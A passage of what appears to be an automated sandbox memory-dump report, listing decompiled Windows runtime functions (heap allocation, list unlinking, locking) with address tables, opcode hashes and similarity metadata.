                                                                  0x049a26c9
                                                                  0x0495aeb3
                                                                  0x049a26d4
                                                                  0x049a26e1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a26e7
                                                                  0x049a26ee
                                                                  0x049a26f0
                                                                  0x049a26f9
                                                                  0x049a26f9
                                                                  0x049a2702
                                                                  0x049a2708
                                                                  0x049a2708
                                                                  0x049a270b
                                                                  0x049a270f
                                                                  0x049a2711
                                                                  0x049a2711
                                                                  0x049a2725
                                                                  0x049a2725
                                                                  0x00000000
                                                                  0x0495aeb9
                                                                  0x0495aeb9
                                                                  0x0495aebf
                                                                  0x0495aebf
                                                                  0x0495aeb3

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                  • Instruction ID: 626c4c353d10782b1475879d91d5925c5f52b34122a8c1264cdf5c0cfb9e759b
                                                                  • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                  • Instruction Fuzzy Hash: 3621BE316026849FEB26DB69C948B2577E9AF84344F2904F2DD048B7A2E738FD50C7A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B7794, Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E049B7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4a27b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0497F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04957D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04979AE0();
					_t24 = L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                  0x049b7799
                                                                  0x049b779a
                                                                  0x049b779b
                                                                  0x049b77a3
                                                                  0x049b77ab
                                                                  0x049b77ae
                                                                  0x049b77b1
                                                                  0x049b77b1
                                                                  0x049b77bf
                                                                  0x049b77c4
                                                                  0x049b77c8
                                                                  0x049b77ce
                                                                  0x049b77d4
                                                                  0x049b77e0
                                                                  0x049b77e0
                                                                  0x049b77d6
                                                                  0x049b77d6
                                                                  0x049b77de
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049b77de
                                                                  0x049b77e5
                                                                  0x049b77f0
                                                                  0x049b77f3
                                                                  0x049b77f6
                                                                  0x049b77fd
                                                                  0x049b7800
                                                                  0x049b780c
                                                                  0x049b7818
                                                                  0x049b782b
                                                                  0x049b781a
                                                                  0x049b7823
                                                                  0x049b7823
                                                                  0x049b7830
                                                                  0x049b7831
                                                                  0x049b7838
                                                                  0x049b783d
                                                                  0x049b783e
                                                                  0x049b784f
                                                                  0x049b784f
                                                                  0x049b785a

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 415edc1b3449c5f53c0d084bdf810f3538314e0059ac9d673ed4c64fa1188fb9
                                                                  • Instruction ID: 7a91fae6659d2b4168ecfb7dd7c652cfd2dbb27b50ace82ebb861b6caa0334bf
                                                                  • Opcode Fuzzy Hash: 415edc1b3449c5f53c0d084bdf810f3538314e0059ac9d673ed4c64fa1188fb9
                                                                  • Instruction Fuzzy Hash: 7221A172501604ABC725DFA9D980EABB7BDEF88740F1006BDF94AD7760D634E900CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496FD9B, Relevance: .1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E0496FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E049476E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                  0x0496fd9b
                                                                  0x0496fda0
                                                                  0x0496fda1
                                                                  0x0496fdab
                                                                  0x0496fdad
                                                                  0x0496fdb0
                                                                  0x0496fdb8
                                                                  0x0496fe0f
                                                                  0x0496fde6
                                                                  0x0496fde9
                                                                  0x0496fdec
                                                                  0x049ac0c0
                                                                  0x0496fdfe
                                                                  0x0496fe06
                                                                  0x0496fe06
                                                                  0x049ac0c8
                                                                  0x0496fe2d
                                                                  0x0496fe2d
                                                                  0x00000000
                                                                  0x0496fe2d
                                                                  0x049ac0d1
                                                                  0x049ac0e0
                                                                  0x049ac0e5
                                                                  0x049ac0e5
                                                                  0x049ac0e8
                                                                  0x00000000
                                                                  0x049ac0e8
                                                                  0x0496fdf4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496fdf6
                                                                  0x0496fdfa
                                                                  0x0496fe1a
                                                                  0x0496fe1f
                                                                  0x0496fe1f
                                                                  0x0496fdfc
                                                                  0x00000000
                                                                  0x0496fdfc
                                                                  0x0496fdcc
                                                                  0x0496fdd0
                                                                  0x0496fe26
                                                                  0x00000000
                                                                  0x0496fe26
                                                                  0x0496fdd8
                                                                  0x0496fddb
                                                                  0x0496fddd
                                                                  0x0496fde0
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                  • Instruction ID: d62ff7bcb940ba7554ab1e83e3ebe695062b6889bb6cef9975638775ef475e2c
                                                                  • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                  • Instruction Fuzzy Hash: 18219F72601640DFDB31CF49E544E66FBEAEB94B10F2585BEE9468B618E730BC00DB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04939240, Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 77%
                                                                  			E04939240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4a0f708);
				E0498D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E049795D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E049795D0();
				_t33 =  *0x4a284c4; // 0x0
				L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4a284c4; // 0x0
				L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4a284c4; // 0x0
				E04952280(L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4a286b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E049795D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E049795D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04939325();
					_t50 =  *0x4a284c4; // 0x0
					return E0498D0D1(L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                  0x04939240
                                                                  0x04939242
                                                                  0x04939247
                                                                  0x0493924c
                                                                  0x0493924e
                                                                  0x04939255
                                                                  0x04939257
                                                                  0x0493925a
                                                                  0x0493925f
                                                                  0x0493925f
                                                                  0x04939266
                                                                  0x04939271
                                                                  0x04939276
                                                                  0x04939279
                                                                  0x0493927e
                                                                  0x04939295
                                                                  0x0493929a
                                                                  0x049392b1
                                                                  0x049392b6
                                                                  0x049392d7
                                                                  0x049392dc
                                                                  0x049392e0
                                                                  0x049392e6
                                                                  0x049392e8
                                                                  0x049392ee
                                                                  0x04939332
                                                                  0x04939333
                                                                  0x04939337
                                                                  0x04939338
                                                                  0x0493933a
                                                                  0x0493933a
                                                                  0x0493933d
                                                                  0x04939342
                                                                  0x04939342
                                                                  0x04939345
                                                                  0x04939349
                                                                  0x0493934e
                                                                  0x04939352
                                                                  0x04939357
                                                                  0x049392f4
                                                                  0x049392f4
                                                                  0x049392f6
                                                                  0x049392f9
                                                                  0x04939300
                                                                  0x04939306
                                                                  0x04939324
                                                                  0x04939324

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 831011500d00fd1eaf022b71ff0b81f04452f010536ba0b623776dd5f2d97d55
                                                                  • Instruction ID: fa7cddf628a7482d04682bea9d24116a025028812ad15030f664ba3b76d15e8f
                                                                  • Opcode Fuzzy Hash: 831011500d00fd1eaf022b71ff0b81f04452f010536ba0b623776dd5f2d97d55
                                                                  • Instruction Fuzzy Hash: 852136B1041A00DFD722EF68DA40F59BBB9FF58708F144ABCA049966B1CB79FA41DB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496B390, Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 54%
                                                                  			E0496B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04952280(_t12, 0x4a28608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E049700C2(0x4a28608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                  0x0496b395
                                                                  0x0496b3a2
                                                                  0x0496b3a5
                                                                  0x0496b3aa
                                                                  0x0496b3b2
                                                                  0x0496b3ba
                                                                  0x0496b3bd
                                                                  0x0496b3c0
                                                                  0x0496b3c4
                                                                  0x0496b3c9
                                                                  0x049aa3e9
                                                                  0x049aa3ed
                                                                  0x049aa3f0
                                                                  0x049aa3ff
                                                                  0x049aa403
                                                                  0x049aa409
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049aa40b
                                                                  0x049aa40b
                                                                  0x049aa40f
                                                                  0x049aa415
                                                                  0x049aa423
                                                                  0x049aa423
                                                                  0x049aa415
                                                                  0x0496b3d1
                                                                  0x0496b3e8
                                                                  0x0496b3e8
                                                                  0x0496b3d9

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bcdd79f2324fc15f23ed5af9b5b1a1a6cead16a32dae544d50a773e43b1abde9
                                                                  • Instruction ID: 1a881d6d03ebc30ecee9b47e1db952714b6eb5f41b533038ca41f5fb4a428802
                                                                  • Opcode Fuzzy Hash: bcdd79f2324fc15f23ed5af9b5b1a1a6cead16a32dae544d50a773e43b1abde9
                                                                  • Instruction Fuzzy Hash: 471125323021209BDB28DA18DE81A6B729BEBC5234B24053DED16D7690E935BC02D7D4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049C4257, Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E049C4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4a108d0);
				E0498D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E049C41E8(__ebx, __edi, __ecx, _t39);
				E0494EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4a287e4;
					_t18 =  *0x4a287e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4a25cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4a287e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4a287e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04937055(_t31 + 0xfffffff8);
								_t24 =  *0x4a287e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4a287e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4a25cd0;
				if( *0x4a25cd0 <= 0) {
					L04937055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4a287e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4a287e8 = _t30;
						 *0x4a287e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0498D0D1(L049C4320());
			}















                                                                  0x049c4257
                                                                  0x049c4257
                                                                  0x049c4257
                                                                  0x049c4259
                                                                  0x049c425e
                                                                  0x049c4263
                                                                  0x049c4265
                                                                  0x049c4273
                                                                  0x049c4278
                                                                  0x049c427c
                                                                  0x049c427f
                                                                  0x049c4281
                                                                  0x049c4287
                                                                  0x049c42d7
                                                                  0x049c42d7
                                                                  0x049c42da
                                                                  0x049c428d
                                                                  0x049c428d
                                                                  0x049c428f
                                                                  0x049c4292
                                                                  0x049c4297
                                                                  0x049c429c
                                                                  0x049c42a0
                                                                  0x049c42a6
                                                                  0x049c42a8
                                                                  0x049c42ae
                                                                  0x049c42b3
                                                                  0x00000000
                                                                  0x049c42ba
                                                                  0x049c42ba
                                                                  0x049c42bf
                                                                  0x049c42c5
                                                                  0x049c42ca
                                                                  0x049c42cf
                                                                  0x049c42d0
                                                                  0x00000000
                                                                  0x049c42d0
                                                                  0x049c42b3
                                                                  0x00000000
                                                                  0x049c42a6
                                                                  0x049c429c
                                                                  0x049c42dc
                                                                  0x049c42dc
                                                                  0x049c42e3
                                                                  0x049c4309
                                                                  0x049c42e5
                                                                  0x049c42e5
                                                                  0x049c42e8
                                                                  0x049c42ee
                                                                  0x049c42f0
                                                                  0x00000000
                                                                  0x049c42f2
                                                                  0x049c42f2
                                                                  0x049c42f4
                                                                  0x049c42f7
                                                                  0x049c42f9
                                                                  0x049c4300
                                                                  0x049c4300
                                                                  0x049c42f0
                                                                  0x049c430e
                                                                  0x049c431f

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 45164e989a3f2259587378cf406ad4d84549316f7e9616e7f770e994a36f4498
                                                                  • Instruction ID: f4ea37e090216165218fde407b780bb045bb470816005d8a7b14e236f1385ce0
                                                                  • Opcode Fuzzy Hash: 45164e989a3f2259587378cf406ad4d84549316f7e9616e7f770e994a36f4498
                                                                  • Instruction Fuzzy Hash: 022190B0A02601DFE724EF69D610A2477F5FB95359B50C3BED1458B290E73AE882DF42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B46A7, Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E049B46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0497F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0496D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L049577F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                  0x049b46b7
                                                                  0x049b46ba
                                                                  0x049b46c5
                                                                  0x049b46c8
                                                                  0x049b46d0
                                                                  0x049b46d4
                                                                  0x049b46e6
                                                                  0x049b46e9
                                                                  0x049b46f4
                                                                  0x049b46ff
                                                                  0x049b4705
                                                                  0x049b4706
                                                                  0x049b470c
                                                                  0x049b4713
                                                                  0x049b471b
                                                                  0x049b4723
                                                                  0x049b4725
                                                                  0x049b46d6
                                                                  0x049b46d9
                                                                  0x049b46db
                                                                  0x049b46db
                                                                  0x049b4732

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                  • Instruction ID: 6cb647d53aca7bcd8ac77c7b5cc2d08918a8f3aace49938f8b284dcdb04c0689
                                                                  • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                  • Instruction Fuzzy Hash: 69110272604208BBD7019F5C99809BEBBB9EFC5304F1080AAF9848B351DA319D51D7A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04962397, Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 34%
                                                                  			E04962397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4a2848c != 0) {
					L0495FAD0(0x4a28610);
					if( *0x4a2848c == 0) {
						E0495FA00(0x4a28610, _t19, _t27, 0x4a28610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04962581(0x4a28610, 0x49150a0, _t26, _t27, _t28);
						E0495FA00(0x4a28610, 0x49150a0, _t27, 0x4a28610);
					}
				} else {
					L1:
					_t11 =  *0x4a28614; // 0x1
					if(_t11 == 0) {
						_t11 = E04974886(0x4911088, 1, 0x4a28614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04962581(0x4a28610, (_t11 << 4) + 0x4915070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                  0x049623b0
                                                                  0x049623b6
                                                                  0x04962409
                                                                  0x04962415
                                                                  0x049a5ae9
                                                                  0x00000000
                                                                  0x0496241b
                                                                  0x0496241b
                                                                  0x0496241d
                                                                  0x04962427
                                                                  0x0496242e
                                                                  0x04962430
                                                                  0x04962430
                                                                  0x049623b8
                                                                  0x049623b8
                                                                  0x049623b8
                                                                  0x049623bf
                                                                  0x049623fc
                                                                  0x049623fc
                                                                  0x049623c1
                                                                  0x049623c3
                                                                  0x049623d0
                                                                  0x049623d8
                                                                  0x049623d8
                                                                  0x049623dc
                                                                  0x049623de
                                                                  0x049623e1
                                                                  0x049623e1
                                                                  0x049623ec

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9d31b766d2c172ae68df8213a4709654245670f743d48a32697a01ac6f39dc39
                                                                  • Instruction ID: 8c9e6abb53f860a9167b8f3cd0c9d6afdac2e818144604c784009f2d0bb0dc86
                                                                  • Opcode Fuzzy Hash: 9d31b766d2c172ae68df8213a4709654245670f743d48a32697a01ac6f39dc39
                                                                  • Instruction Fuzzy Hash: 6311E53270031067F330BB2DAD40F25B2CDEB90B64F15897AFA07A7260E678F9019755
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493C962, Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 42%
                                                                  			E0493C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4a2d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0494EEF0(0x4a270a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E049BF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0494EB70(_t29, 0x4a270a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0497B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E049BF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4a270c0; // 0x0
					while(_t38 != 0x4a270c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4a2b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                  0x0493c96a
                                                                  0x0493c974
                                                                  0x0493c988
                                                                  0x0493c98a
                                                                  0x049a7c9d
                                                                  0x049a7c9f
                                                                  0x049a7ca4
                                                                  0x049a7cae
                                                                  0x049a7cf0
                                                                  0x049a7cf5
                                                                  0x049a7cfa
                                                                  0x0493c992
                                                                  0x0493c996
                                                                  0x0493c997
                                                                  0x0493c998
